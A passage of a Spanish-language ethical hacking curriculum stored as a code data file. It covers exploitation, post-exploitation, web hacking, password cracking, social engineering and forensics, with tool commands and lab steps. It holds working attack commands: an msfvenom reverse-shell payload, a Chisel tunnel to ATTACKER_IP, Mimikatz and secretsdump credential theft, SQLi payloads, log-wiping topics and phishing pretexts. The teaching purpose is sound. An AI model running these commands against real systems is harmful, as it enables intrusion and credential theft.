        instalacion: "sudo apt install metasploit-framework",
        comando: "sudo msfdb init && msfconsole",
      },
      {
        nombre: "msfvenom",
        descripcion: "Generador de payloads de Metasploit para crear ejecutables maliciosos, shellcodes y web shells",
        comando: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 -f exe -o payload.exe",
      },
      {
        nombre: "Hydra",
        descripcion: "Herramienta de brute force para más de 50 protocolos: SSH, FTP, HTTP, SMB, RDP, MySQL...",
        instalacion: "sudo apt install hydra",
        comando: "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://IP",
      },
      {
        nombre: "CrackMapExec (CME/NetExec)",
        descripcion: "Suite completa para ataques en entornos Active Directory: SMB, RDP, WinRM, MSSQL",
        instalacion: "sudo apt install crackmapexec",
        comando: "crackmapexec smb IP -u usuario -p contraseña --shares",
      },
      {
        nombre: "searchsploit",
        descripcion: "Búsqueda offline de exploits en la base de datos de Exploit-DB",
        instalacion: "sudo apt install exploitdb",
        comando: "searchsploit vsftpd 2.3.4 && searchsploit -m 17491",
      },
    ],
    labs: [
      {
        titulo: "Explotar vsftpd 2.3.4 en Metasploitable2",
        descripcion:
          "vsftpd 2.3.4 tiene un backdoor que escucha en el puerto 6200 cuando envías :) en el usuario. Explotación trivial pero muy didáctica",
        pasos: [
          "Verifica que el puerto 21 está abierto con vsftpd 2.3.4: nmap -sV -p 21 $VICTIM_IP",
          "Abre msfconsole: sudo msfconsole",
          "Busca el exploit: search vsftpd",
          "Usa el módulo: use exploit/unix/ftp/vsftpd_234_backdoor",
          "Configura el objetivo: set RHOSTS $VICTIM_IP",
          "Ejecuta: run (o exploit)",
          "Deberías obtener una shell root directamente",
          "Verifica: id && whoami && uname -a",
          "Explora el sistema: ls /root, cat /etc/shadow",
          "Ahora intenta manualmente: nc IP 21 → escribe 'USER test:)' → nc IP 6200",
        ],
        herramientas: ["metasploit", "nmap", "netcat"],
        tips: [
          "Siempre entiende el exploit antes de usarlo — estudia el código Ruby del módulo en /usr/share/metasploit-framework/modules/",
          "Un shell simple es poderoso pero Meterpreter tiene funciones extra: upload, download, screenshot, hashdump",
        ],
      },
      {
        titulo: "Buffer Overflow básico (BOF) con ret2shellcode",
        descripcion: "Aprende el fundamento de todos los exploits: desbordar el buffer del stack y controlar EIP",
        pasos: [
          "Instala las herramientas: sudo apt install gdb peda python3-pwntools",
          "Crea un programa vulnerable en C: int main(){char buf[100]; gets(buf);}",
          "Compila sin protecciones: gcc -o vuln vuln.c -m32 -fno-stack-protector -z execstack -no-pie",
          "Encuentra el offset: python3 -c 'from pwn import *; print(cyclic(200))' | ./vuln",
          "Analiza el crash en GDB+PEDA: gdb ./vuln → run < input.txt → info registers",
          "Calcula offset: python3 -c 'from pwn import *; print(cyclic_find(0x61616161))'",
          "Genera shellcode: msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\\x00'",
          "Construye el exploit con pwntools: offset + EIP + NOPsled + shellcode",
          "Ejecuta y obtén shell: python3 exploit.py",
        ],
        herramientas: ["gdb", "peda", "pwntools", "gcc", "msfvenom"],
        tips: [
          "PEDA (Python Exploit Development Assistance) hace GDB mucho más visual y útil",
          "ROPgadget y Ropper son esenciales cuando no puedes ejecutar shellcode directo (NX activo)",
        ],
      },
    ],
    conceptosClave: [
      { termino: "EIP/RIP", definicion: "Instruction Pointer — registro que apunta a la siguiente instrucción a ejecutar. Controlarlo = ejecución de código arbitrario" },
      { termino: "NOP Sled", definicion: "Secuencia de instrucciones NOP (\\x90) que 'deslizan' la ejecución hacia el shellcode cuando ASLR causa variación de addresses" },
      { termino: "Meterpreter", definicion: "Payload avanzado de Metasploit que corre en memoria (sin disco), encripta comunicaciones y tiene muchas funciones post-explotación" },
      { termino: "Reverse Shell", definicion: "El objetivo conecta de vuelta al atacante — supera firewalls que bloquean conexiones entrantes" },
      { termino: "Bind Shell", definicion: "El objetivo abre un puerto y escucha — el atacante conecta. Bloqueado por firewalls/NAT típicamente" },
    ],
    recursos: [
      { titulo: "TCM Security — Practical Ethical Hacking", url: "https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course", tipo: "video", gratuito: false },
      { titulo: "Exploit Development — Buffer Overflow (TryHackMe)", url: "https://tryhackme.com/module/how-to-hack", tipo: "plataforma", gratuito: true },
      { titulo: "ired.team — Red Team Notes", url: "https://www.ired.team/", tipo: "blog", gratuito: true },
      { titulo: "Exploit Database", url: "https://www.exploit-db.com/", tipo: "herramienta", gratuito: true },
    ],
    consejos: [
      "Entiende el exploit antes de ejecutarlo — estudia el código del módulo de Metasploit",
      "Practica BOF en máquinas de TryHackMe antes de ir a HTB — la curva de aprendizaje es alta",
      "msfvenom -l payloads | grep windows/x64 para ver todos los payloads disponibles",
    ],
  },

  {
    id: "post-explotacion",
    numero: 7,
    titulo: "Post-Explotación",
    subtitulo: "Escalada de privilegios, movimiento lateral y persistencia",
    descripcion:
      "Tener una shell inicial es solo el comienzo. El verdadero pentester sabe qué hacer DESPUÉS del acceso inicial: escalar privilegios, moverse por la red, establecer persistencia, pivotar hacia sistemas internos y documentar el impacto real para el cliente.",
    duracion: "4-6 semanas",
    nivel: "Avanzado",
    icono: "🏴",
    color: "night",
    temas: [
      "Escalada de privilegios en Linux: kernel exploits, SUID, sudo -l, cron, PATH, capabilities",
      "LinPEAS y LinEnum: automatización de enumeración de privesc",
      "Escalada en Windows: SeImpersonatePrivilege, unquoted service paths, registry, DLL hijacking",
      "WinPEAS, PowerUp, SharpUp: automatización Windows privesc",
      "Mimikatz: extracción de credenciales de LSASS en memoria",
      "Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash",
      "BloodHound: visualización y análisis de Active Directory",
      "SharpHound: recolector de datos para BloodHound",
      "Kerberoasting: extracción y cracking de tickets TGS",
      "AS-REP Roasting: atacar cuentas sin pre-autenticación Kerberos",
      "DCSync: replicar credenciales como Domain Controller",
      "Pivoting: SSH tunneling, Chisel, Ligolo-ng",
      "Persistencia: registro Windows, cron, tareas programadas, servicios",
      "Limpiar huellas: logs de Windows, bash_history, timestamps",
      "Dump de NTDS.dit: toda la base de datos de Active Directory",
    ],
    herramientas: [
      {
        nombre: "LinPEAS",
        descripcion: "El script más completo para enumeración de escalada de privilegios en Linux. Encuentra vectores en segundos",
        instalacion: "curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh",
        comando: "chmod +x linpeas.sh && ./linpeas.sh | tee linpeas_output.txt",
      },
      {
        nombre: "Mimikatz",
        descripcion: "La herramienta más famosa de post-explotación Windows — extrae contraseñas en texto claro, NTLM hashes y tickets Kerberos de memoria",
        comando: "privilege::debug\nlsadump::sam\nsekurlsa::logonpasswords\nlsadump::dcsync /user:krbtgt",
      },
      {
        nombre: "BloodHound",
        descripcion: "Visualización gráfica de relaciones en Active Directory para encontrar rutas de escalada a Domain Admin",
        instalacion: "sudo apt install bloodhound",
        comando: "sudo neo4j start && bloodhound &",
      },
      {
        nombre: "Chisel",
        descripcion: "Tunneling TCP/UDP sobre HTTP con soporte SOCKS5 — para pivotar en redes internas desde el exterior",
        instalacion: "go install github.com/jpillora/chisel@latest",
        comando: "# Servidor: chisel server -p 8080 --reverse\\n# Cliente: chisel client ATTACKER_IP:8080 R:socks",
      },
      {
        nombre: "Impacket",
        descripcion: "Suite de herramientas Python para protocolos de red Windows: SMB, Kerberos, DCOM, WMI, LDAP",
        instalacion: "pip3 install impacket",
        comando: "impacket-secretsdump -just-dc DOMAIN/admin:pass@DC_IP",
      },
    ],
    labs: [
      {
        titulo: "Escalada de privilegios completa en Linux",
        descripcion: "Parte de un shell de usuario limitado y llega a root usando múltiples técnicas",
        pasos: [
          "Obtén shell inicial: exploita un servicio vulnerable para obtener shell como www-data o usuario",
          "Estabiliza la shell: python3 -c 'import pty;pty.spawn(\"/bin/bash\")' && export TERM=xterm",
          "Ejecuta LinPEAS: ./linpeas.sh 2>/dev/null | tee salida.txt",
          "Revisa sudo -l: ¿puedes ejecutar algo como otro usuario?",
          "Busca SUID: find / -perm -4000 -type f 2>/dev/null",
          "Revisa cron jobs: cat /etc/crontab && ls /etc/cron*",
          "Revisa capabilities: getcap -r / 2>/dev/null",
          "Busca archivos con contraseñas: grep -r 'password' /var/www/ 2>/dev/null",
          "Verifica versión del kernel: uname -a y busca kernel exploits en Exploit-DB",
          "Cuando tengas root: cat /etc/shadow | tee shadows.txt && id",
        ],
        herramientas: ["linpeas", "GTFOBins", "find", "sudo"],
        tips: [
          "La estabilización del shell es CRUCIAL — sin ella perderás la sesión en cualquier momento",
          "Documenta CADA técnica que intentas aunque falle — es información valiosa para el informe",
        ],
      },
      {
        titulo: "Active Directory: de usuario a Domain Admin",
        descripcion: "Compromete un entorno Active Directory desde un usuario de dominio hasta Domain Admin",
        pasos: [
          "Enumeración inicial: crackmapexec smb DC_IP -u user -p pass --users --groups",
          "Recolecta datos con BloodHound: SharpHound.exe -c All --zipfilename bloodhound.zip",
          "Importa en BloodHound y analiza la ruta más corta a Domain Admin",
          "Kerberoasting: GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request -outputfile hashes.txt",
          "Crackea los hashes: hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt",
          "AS-REP Roast usuarios sin pre-auth: GetNPUsers.py DOMAIN/ -usersfile users.txt -no-pass",
          "Pass-the-Hash si tienes NTLM: crackmapexec smb TARGETS -u admin -H NTLM_HASH",
          "Si llegas a DA: impacket-secretsdump -just-dc DOMAIN/admin:pass@DC_IP",
          "Golden Ticket: mimikatz → kerberos::golden /user:admin /domain:DOMAIN /sid:SID /krbtgt:HASH",
        ],
        herramientas: ["BloodHound", "Impacket", "CrackMapExec", "hashcat", "Mimikatz"],
        tips: [
          "BloodHound te mostrará visualmente la cadena de ataques — Shortest Path to Domain Admin",
          "Kerberoasting es silencioso y muy efectivo si los usuarios tienen contraseñas débiles",
        ],
      },
    ],
    conceptosClave: [
      { termino: "Kerberoasting", definicion: "Solicitar tickets TGS de cuentas con SPN para crackearlos offline — no requiere privilegios especiales" },
      { termino: "Pass-the-Hash (PtH)", definicion: "Usar el hash NTLM directamente para autenticarse sin saber la contraseña en texto claro" },
      { termino: "DCSync", definicion: "Simular la replicación de un Domain Controller para extraer hashes de todos los usuarios del dominio" },
      { termino: "Golden Ticket", definicion: "Ticket Kerberos forjado con el hash de krbtgt — acceso persistente e indetectable a cualquier recurso del dominio" },
      { termino: "LSASS", definicion: "Local Security Authority Subsystem Service — proceso Windows que almacena credenciales en memoria" },
    ],
    recursos: [
      { titulo: "HackTricks — Post-exploitation", url: "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology", tipo: "blog", gratuito: true },
      { titulo: "TCM Security — Practical Active Directory", url: "https://academy.tcm-sec.com/", tipo: "video", gratuito: false },
      { titulo: "PEASS-ng (LinPEAS/WinPEAS)", url: "https://github.com/peass-ng/PEASS-ng", tipo: "herramienta", gratuito: true },
      { titulo: "VulnHub — Active Directory labs", url: "https://www.vulnhub.com/", tipo: "plataforma", gratuito: true },
    ],
    consejos: [
      "Empieza con labs de TryHackMe AD antes de atacar HackTheBox Pro Labs",
      "BloodHound cambia completamente la forma de ver un AD — invierte tiempo en aprenderlo bien",
      "El hashing en Windows es diferente a Linux — NTLM vs /etc/shadow",
    ],
  },

  {
    id: "web-hacking",
    numero: 8,
    titulo: "Web Hacking",
    subtitulo: "OWASP Top 10, Burp Suite y vulnerabilidades web avanzadas",
    descripcion:
      "La web es la superficie de ataque más grande del mundo. Aprenderás todas las vulnerabilidades del OWASP Top 10 2023, a usar Burp Suite como un profesional, y a encontrar y explotar desde SQLi básico hasta SSRF, SSTI y vulnerabilidades de lógica de negocio.",
    duracion: "6-8 semanas",
    nivel: "Intermedio",
    icono: "🕸️",
    color: "polisario",
    temas: [
      "OWASP Top 10 2023: A01 Broken Access Control → A10 SSRF",
      "SQL Injection: UNION, Blind Boolean, Blind Time-based, Error-based, Out-of-band",
      "SQLMap avanzado: tamper scripts, bypasses de WAF, dump completo",
      "XSS: Reflected, Stored, DOM-based — bypass de filtros y CSP",
      "CSRF: detección, bypass de tokens, SameSite cookie bypass",
      "SSRF: protocolos (file://, gopher://, dict://), bypass de whitelist, cloud metadata",
      "LFI/RFI: log poisoning, PHP wrappers (php://filter, data://)",
      "Path Traversal: ../../../../etc/passwd, bypass de filtros",
      "XXE: classic, blind, OOB, file read, SSRF via XXE",
      "IDOR: Insecure Direct Object Reference — enumerar IDs, UUIDs",
      "SSTI: Server-Side Template Injection en Jinja2, Twig, Freemarker",
      "Broken Auth: JWT attacks (alg:none, RS256→HS256, weak secret)",
      "Business Logic flaws: race conditions, price manipulation",
      "OAuth 2.0 vulnerabilities: token leakage, open redirects",
      "HTTP Request Smuggling: CL.TE, TE.CL, TE.TE",
    ],
    herramientas: [
      {
        nombre: "Burp Suite Community/Pro",
        descripcion: "El proxy de intercepción más poderoso para web hacking. Proxy, Scanner, Repeater, Intruder, Decoder, Collaborator",
        instalacion: "sudo apt install burpsuite",
        comando: "burpsuite &  # Configura proxy en Firefox: 127.0.0.1:8080",
      },
      {
        nombre: "SQLMap",
        descripcion: "Automatiza la detección y explotación de SQL Injection con soporte para 6 técnicas y 30+ bases de datos",
        instalacion: "sudo apt install sqlmap",
        comando: "sqlmap -u 'http://IP/page?id=1' --dbs --batch --level=5 --risk=3",
      },
      {
        nombre: "FFUF",
        descripcion: "Web fuzzer ultrarrápido escrito en Go — fuzz de directorios, parámetros, headers, POST body, VHosts",
        instalacion: "sudo apt install ffuf",
        comando: "ffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -fc 404",
      },
      {
        nombre: "WPScan",
        descripcion: "Escáner especializado en WordPress — enumera plugins, temas, usuarios y vulnerabilidades",
        instalacion: "sudo apt install wpscan",
        comando: "wpscan --url http://IP --enumerate u,p,t --api-token TU_TOKEN",
      },
      {
        nombre: "jwt_tool",
        descripcion: "Herramienta para analizar, forjar y atacar JSON Web Tokens",
        instalacion: "git clone https://github.com/ticarpi/jwt_tool && pip3 install -r requirements.txt",
        comando: "python3 jwt_tool.py TOKEN -T  # tamper | -C -d wordlist.txt  # crack",
      },
    ],
    labs: [
      {
        titulo: "SQL Injection manual y con SQLMap",
        descripcion:
          "Explota una SQLi clásica manualmente con UNION y luego automatiza con SQLMap",
        pasos: [
          "Objetivo: DVWA con nivel de seguridad Low (http://127.0.0.1/dvwa/)",
          "Detecta SQLi manualmente: introduce ' en el campo → ¿error SQL?",
          "Determina columnas: ' ORDER BY 1-- | ' ORDER BY 2-- | ' ORDER BY 3-- (hasta error)",
          "UNION injection: ' UNION SELECT null,null-- (ajusta columnas)",
          "Obtén versión: ' UNION SELECT null,@@version--",
          "Obtén bases de datos: ' UNION SELECT null,group_concat(schema_name) FROM information_schema.schemata--",
          "Obtén tablas de dvwa: ' UNION SELECT null,group_concat(table_name) FROM information_schema.tables WHERE table_schema='dvwa'--",
          "Obtén usuarios: ' UNION SELECT user,password FROM dvwa.users--",
          "Automatiza con SQLMap: sqlmap -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='PHPSESSID=XXX;security=low' -D dvwa -T users --dump",
          "Crackea los hashes MD5 obtenidos: hashcat -m 0 hashes.txt rockyou.txt",
        ],
        herramientas: ["browser", "sqlmap", "hashcat", "DVWA"],
        tips: [
          "La SQLi manual te enseña a pensar como el atacante — no vayas directo a sqlmap",
          "Añade --random-agent y --delay=2 para evadir WAFs básicos con sqlmap",
          "Blind SQLi es más compleja pero más común — practica con el nivel medium de DVWA",
        ],
      },
      {
        titulo: "Burp Suite: interceptar, modificar y repetir requests",
        descripcion: "Domina el flujo de trabajo de Burp Suite para web hacking profesional",
        pasos: [
          "Configura FoxyProxy en Firefox → Burp proxy en 127.0.0.1:8080",
          "Instala el certificado CA de Burp en el navegador (http://burp → Download CA Certificate)",
          "Intercepta un login: activa Intercept y haz login en DVWA",
          "Observa el request POST con las credenciales",
          "Mándalo al Repeater (Ctrl+R) para modificarlo manualmente",
          "Mándalo al Intruder para brute force: posición de la contraseña como §password§",
          "Configura ataque tipo Sniper con wordlist rockyou.txt",
          "Lanza el ataque y filtra por longitud de respuesta diferente",
          "Usa el Decoder para encodear/decodear base64, URL, HTML",
          "Explora el Target → Site map para ver toda la aplicación mapeada",
        ],
        herramientas: ["Burp Suite", "Firefox", "FoxyProxy"],
        tips: [
          "Burp Pro tiene un escáner activo automático que detecta SQLi, XSS, y más de 100 vulnerabilidades",
          "Aprende los atajos de teclado de Burp — aceleran el trabajo enormemente",
        ],
      },
    ],
    conceptosClave: [
      { termino: "OWASP Top 10", definicion: "Lista de las 10 categorías de riesgo más críticas en aplicaciones web. La referencia estándar en seguridad web" },
      { termino: "SSRF", definicion: "Server-Side Request Forgery — fuerza al servidor a hacer requests a sistemas internos. Crítico en cloud (metadata 169.254.169.254)" },
      { termino: "SSTI", definicion: "Server-Side Template Injection — inyecta código en motores de templates para RCE. {{7*7}}=49 = vulnerable a Jinja2" },
      { termino: "IDOR", definicion: "Insecure Direct Object Reference — acceder a recursos de otros usuarios cambiando un ID (ej: /user/123 → /user/124)" },
      { termino: "JWT", definicion: "JSON Web Token — tokens de autenticación que si están mal firmados permiten forjar identidades" },
    ],
    recursos: [
      { titulo: "PortSwigger Web Security Academy (GRATIS)", url: "https://portswigger.net/web-security", tipo: "plataforma", gratuito: true },
      { titulo: "HackTheBox Web Challenges", url: "https://www.hackthebox.com/", tipo: "plataforma", gratuito: false },
      { titulo: "The Web Application Hacker's Handbook", url: "https://www.wiley.com/en-us/The+Web+Application+Hacker%27s+Handbook-p-9781118026472", tipo: "libro", gratuito: false },
      { titulo: "DVWA — Damn Vulnerable Web App", url: "https://dvwa.co.uk/", tipo: "herramienta", gratuito: true },
    ],
    consejos: [
      "PortSwigger Web Security Academy es el mejor recurso gratuito para web hacking — ¡mejor que muchos cursos de pago!",
      "Practica cada vulnerabilidad del OWASP Top 10 en DVWA, WebGoat y luego en HTB",
      "Aprende a leer código fuente (PHP, Node.js, Python) — los mejores bugs se encuentran en code review",
    ],
  },

  {
    id: "criptografia",
    numero: 9,
    titulo: "Criptografía y Contraseñas",
    subtitulo: "Fundamentos criptográficos, cracking de hashes y esteganografía",
    descripcion:
      "La criptografía es el escudo que protege los datos, y el hacker ético debe saber cómo romperlo. Aprenderás los fundamentos teóricos, a crackear hashes con herramientas profesionales, y las técnicas de esteganografía usadas para ocultar información.",
    duracion: "2-3 semanas",
    nivel: "Intermedio",
    icono: "🔐",
    color: "sand",
    temas: [
      "Criptografía simétrica: AES, 3DES, RC4 — modos CBC, CTR, ECB",
      "Criptografía asimétrica: RSA, ECDSA, Diffie-Hellman",
      "Funciones hash: MD5, SHA-1, SHA-256, bcrypt, Argon2 — colisiones",
      "PKI y certificados TLS: CA, cadena de confianza, CSR",
      "Ataques a contraseñas: diccionario, brute force, rainbow tables, reglas",
      "hashcat: GPU-accelerated cracking con todas las reglas y máscaras",
      "John the Ripper: versatilidad y formatos soportados",
      "Generación de wordlists con CeWL, crunch y reglas de hashcat",
      "Ataques a cifrado débil: ECB penguin attack, padding oracle",
      "Desafíos de criptografía en CTFs: frequency analysis, XOR, RSA weak params",
      "Esteganografía: técnicas LSB, DCT en imágenes y audio",
      "Herramientas de estegano: steghide, binwalk, exiftool, stegsolve, zsteg",
      "DPAPI: descifrado de credenciales almacenadas en Windows",
    ],
    herramientas: [
      {
        nombre: "hashcat",
        descripcion: "El cracker de contraseñas más rápido del mundo — usa GPU para millones de hashes por segundo",
        instalacion: "sudo apt install hashcat",
        comando: "hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule",
      },
      {
        nombre: "John the Ripper",
        descripcion: "Versátil cracker multi-formato — excelente para formatos específicos: zip, pdf, ssh keys, Linux shadow",
        instalacion: "sudo apt install john",
        comando: "john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt",
      },
      {
        nombre: "CeWL",
        descripcion: "Genera wordlists personalizadas scrapeando el sitio web del objetivo — las contraseñas suelen relacionarse con la empresa",
        instalacion: "sudo apt install cewl",
        comando: "cewl -d 3 -m 8 -w wordlist_empresa.txt https://empresa.com",
      },
      {
        nombre: "steghide",
        descripcion: "Oculta y extrae datos dentro de imágenes JPEG y audio WAV/MP3 con clave o sin ella",
        instalacion: "sudo apt install steghide",
        comando: "steghide extract -sf imagen.jpg  # sin contraseña: probar con steghide extract -sf imagen.jpg -p ''",
      },
      {
        nombre: "binwalk",
        descripcion: "Analiza y extrae firmware y archivos embebidos — detecta archivos dentro de imágenes, firmwares IoT",
        instalacion: "sudo apt install binwalk",
        comando: "binwalk -e archivo.png  # extrae todos los archivos embebidos",
      },
    ],
    labs: [
      {
        titulo: "Cracking de hashes de /etc/shadow con hashcat",
        descripcion: "Crackea los hashes obtenidos de un sistema comprometido usando técnicas progresivas",
        pasos: [
          "Identifica el tipo de hash: hashcat --identify hash.txt o hash-identifier",
          "MD5 Linux ($1$): hashcat -m 500 hash.txt rockyou.txt",
          "SHA512crypt ($6$): hashcat -m 1800 shadow.txt rockyou.txt",
          "NTLM Windows: hashcat -m 1000 ntlm_hashes.txt rockyou.txt",
          "Con reglas: hashcat -m 1000 ntlm_hashes.txt rockyou.txt -r best64.rule -r toggles1.rule",
          "Máscara para patrones: hashcat -m 1000 ntlm_hashes.txt -a 3 ?u?l?l?l?d?d?d?d",
          "Combina diccionario + máscara: hashcat -m 1000 hashes.txt -a 6 rockyou.txt ?d?d?d",
          "Para optimizar velocidad: añade --force --optimized-kernel-enable",
          "Si llevas mucho tiempo, pausa y checkea: hashcat ... --session=mysession --restore",
        ],
        herramientas: ["hashcat", "hash-identifier"],
        tips: [
          "Las reglas multiplican la potencia de tu wordlist enormemente sin necesitar más diccionario",
          "OneRuleToRuleThemAll.rule es una regla comunitaria muy efectiva: buscarla en GitHub",
          "rockyou.txt tiene 14 millones de contraseñas — suficiente para el 80% de los casos",
        ],
      },
    ],
    conceptosClave: [
      { termino: "Salt", definicion: "Valor aleatorio añadido antes de hashear una contraseña — hace inútiles las rainbow tables" },
      { termino: "Rainbow Table", definicion: "Tabla precalculada de hashes para búsqueda rápida. Derrotada por el salting" },
      { termino: "Bcrypt", definicion: "Función de hash diseñada para ser lenta intencionalmente — un hash tarda milisegundos, haciéndolo resistente a brute force" },
      { termino: "Padding Oracle", definicion: "Ataque que explota los mensajes de error de descifrado CBC para descifrar datos sin la clave" },
      { termino: "LSB Steganography", definicion: "Técnica que modifica el bit menos significativo de píxeles para ocultar datos sin cambio visual perceptible" },
    ],
    recursos: [
      { titulo: "CryptoPals Challenges", url: "https://cryptopals.com/", tipo: "plataforma", gratuito: true },
      { titulo: "Hashcat Wiki y Examples", url: "https://hashcat.net/wiki/", tipo: "documento", gratuito: true },
      { titulo: "CyberChef — Swiss Army Knife cryptográfico", url: "https://gchq.github.io/CyberChef/", tipo: "herramienta", gratuito: true },
    ],
    consejos: [
      "CyberChef es imprescindible en CTFs — resuelve encodings, cifrados y conversiones al instante",
      "Investiga la empresa antes de crackear: las contraseñas suelen seguir patrones predecibles (Empresa2024!)",
      "bcrypt y Argon2 tardan meses en crackear incluso con GPU potente — es por diseño",
    ],
  },

  {
    id: "ingenieria-social",
    numero: 10,
    titulo: "Ingeniería Social",
    subtitulo: "Phishing, vishing, pretexting y manipulación psicológica",
    descripcion:
      "El eslabón más débil de la seguridad siempre es el humano. La ingeniería social es el arte de manipular a personas para obtener acceso o información. Este módulo te enseñará las técnicas reales y cómo defenderlas.",
    duracion: "2-3 semanas",
    nivel: "Intermedio",
    icono: "🎭",
    color: "sun",
    temas: [
      "Psicología del ataque: autoridad, urgencia, miedo, reciprocidad, escasez",
      "Spear phishing: phishing dirigido y personalizado con OSINT",
      "Phishing masivo: Gophish para campañas profesionales",
      "Vishing: técnicas de llamadas de engaño (soporte técnico, banco)",
      "Smishing: phishing por SMS",
      "Pretexting: crear historias creíbles para obtener acceso",
      "Baiting: USB drops, QR maliciosos",
      "Tailgating / Piggybacking: acceso físico no autorizado",
      "SET (Social Engineering Toolkit): automatización de ataques",
      "Clone phishing: replicar emails legítimos con link malicioso",
      "Documentar y reportar ataques de ingeniería social",
      "Defensa: concienciación, simulacros, políticas de seguridad",
    ],
    herramientas: [
      {
        nombre: "Gophish",
        descripcion: "Plataforma open-source para campañas de phishing profesionales — tracking de clicks, credenciales capturadas, reportes",
        instalacion: "Descarga binario desde github.com/gophish/gophish/releases",
        comando: "./gophish  # Abre interfaz en https://127.0.0.1:3333",
      },
      {
        nombre: "SET (Social Engineering Toolkit)",
        descripcion: "Framework completo para ataques de ingeniería social: phishing, clonado de sitios, payloads USB",
        instalacion: "sudo apt install set",
        comando: "sudo setoolkit",
      },
      {
        nombre: "EvilGinx3",
        descripcion: "Proxy inverso de phishing que captura cookies de sesión incluso con 2FA activado",
        instalacion: "git clone https://github.com/kgretzky/evilginx2",
        comando: "sudo ./evilginx -p ./phishlets -t ./redirectors",
      },
    ],
    labs: [
      {
        titulo: "Campaña de phishing con Gophish (entorno controlado)",
        descripcion:
          "Configura una campaña de phishing profesional contra usuarios de tu organización en un entorno de pruebas autorizado",
        pasos: [
          "Descarga e instala Gophish: ./gophish (corre en localhost:3333)",
          "Accede a la interfaz con admin / contraseña del primer arranque",
          "Crea un Email Template: replica un email de IT corporativo (reset de contraseña)",
          "Crea una Landing Page: clona la página de login de la empresa (Site Cloner en SET)",
          "Crea un Sending Profile: configura un servidor SMTP de prueba (Mailhog local)",
          "Crea una Campaign: selecciona template, landing page, destinatarios de prueba",
          "Lanza la campaña y monitoriza en tiempo real: clicks, credenciales capturadas",
          "Genera el reporte final con estadísticas de susceptibilidad",
          "Documenta las lecciones aprendidas y propón mitigaciones",
        ],
        herramientas: ["Gophish", "SET", "Mailhog"],
        tips: [
          "SOLO en entornos autorizados — el phishing sin permiso es delito en casi todos los países",
          "Los mejores pretextos apelan a urgencia + autoridad: 'Tu cuenta será bloqueada en 24h, actúa ahora'",
          "La capacitación post-simulacro es la parte más importante — no el ataque en sí",
        ],
      },
    ],
    conceptosClave: [
      { termino: "Spear Phishing", definicion: "Phishing altamente personalizado usando información OSINT del objetivo — tasa de éxito mucho mayor que phishing masivo" },
      { termino: "Pretexting", definicion: "Crear un escenario falso creíble para obtener información o acceso (ej: fingir ser del soporte técnico)" },
      { termino: "Vishing", definicion: "Voice phishing — engaño por llamada telefónica, muy efectivo y subestimado" },
      { termino: "Baiting", definicion: "Dejar USBs infectados en lugares estratégicos confiando en la curiosidad humana" },
    ],
    recursos: [
      { titulo: "The Art of Deception (Kevin Mitnick)", url: "https://www.amazon.com/Art-Deception-Kevin-Mitnick/dp/076454280X", tipo: "libro", gratuito: false },
      { titulo: "Gophish Documentation", url: "https://docs.getgophish.com/", tipo: "documento", gratuito: true },
      { titulo: "SANS Social Engineering Resources", url: "https://www.sans.org/security-awareness-training/", tipo: "blog", gratuito: true },
    ],
    consejos: [
      "La ingeniería social requiere permiso ESCRITO explícito antes de cualquier prueba",
      "Practica las habilidades de comunicación persuasiva — es un arte que se desarrolla con tiempo",
      "El mejor defensor del phishing es un empleado que ha SUFRIDO un simulacro real",
    ],
  },

  {
    id: "forense",
    numero: 11,
    titulo: "Forense Digital y Análisis de Malware",
    subtitulo: "Respuesta a incidentes, análisis de memoria, disco y malware",
    descripcion:
      "El hacker ético también necesita saber DEFENDER. La forense digital te permite investigar intrusiones, analizar malware, preservar evidencia para procesos legales y responder a incidentes. La cara B del pentesting.",
    duracion: "3-4 semanas",
    nivel: "Avanzado",
    icono: "🔬",
    color: "polisario",
    temas: [
      "Principios forenses: preservación, cadena de custodia, no alteración",
      "Adquisición de evidencia: dd, dcfldd, FTK Imager",
      "Análisis de disco con Autopsy y Sleuth Kit",
      "Timeline de actividad con log2timeline/plaso",
      "Análisis de memoria RAM con Volatility3",
      "Network forensics: análisis de capturas pcap",
      "Análisis de logs: Windows Event Log, Syslog, web logs",
      "Artefactos forenses Windows: Registry, Prefetch, LNK, Amcache, ShimCache",
      "Artefactos forenses Linux: .bash_history, /var/log, /tmp, cron",
      "Análisis estático de malware: file, strings, PEview, Ghidra, IDA Free",
      "Análisis dinámico: sandboxes (Any.run, Joe Sandbox, Cuckoo)",
      "Técnicas anti-análisis: packing, obfuscation, sandbox detection",
      "Indicadores de Compromiso (IoC) y threat intelligence",
      "Respuesta a incidentes (IR): contención, erradicación, recuperación",
    ],
    herramientas: [
      {
        nombre: "Volatility3",
        descripcion: "Framework de análisis de memoria RAM — extrae procesos, conexiones, credenciales, injecciones y más de un dump de RAM",
        instalacion: "pip3 install volatility3",
        comando: "python3 vol.py -f memory.dmp windows.pslist  # lista procesos\\npython3 vol.py -f memory.dmp windows.netscan  # conexiones",
      },
      {
        nombre: "Autopsy",
        descripcion: "GUI completa de forense digital — análisis de particiones, recuperación de archivos borrados, timeline, hash lookup",
        instalacion: "sudo apt install autopsy",
        comando: "autopsy &  # Abre interfaz web en http://localhost:9999/autopsy",
      },
      {
        nombre: "Wireshark (Forense)",
        descripcion: "Para análisis forense de capturas de red — detectar C2, exfiltración de datos, lateral movement",
        comando: "wireshark captura.pcap  # Filtros: tcp.flags.syn==1, http.request.method==POST, dns.qry.name contains 'raro'",
      },
      {
        nombre: "Ghidra",
        descripcion: "Framework de reverse engineering de la NSA — desmonta, decompila y analiza binarios de malware",
        instalacion: "Descarga desde ghidra-sre.org",
        comando: "ghidraRun &  # Importa el binario y ejecuta el análisis automático",
      },
      {
        nombre: "Any.run",
        descripcion: "Sandbox interactivo online para análisis dinámico de malware — observa comportamiento en tiempo real",
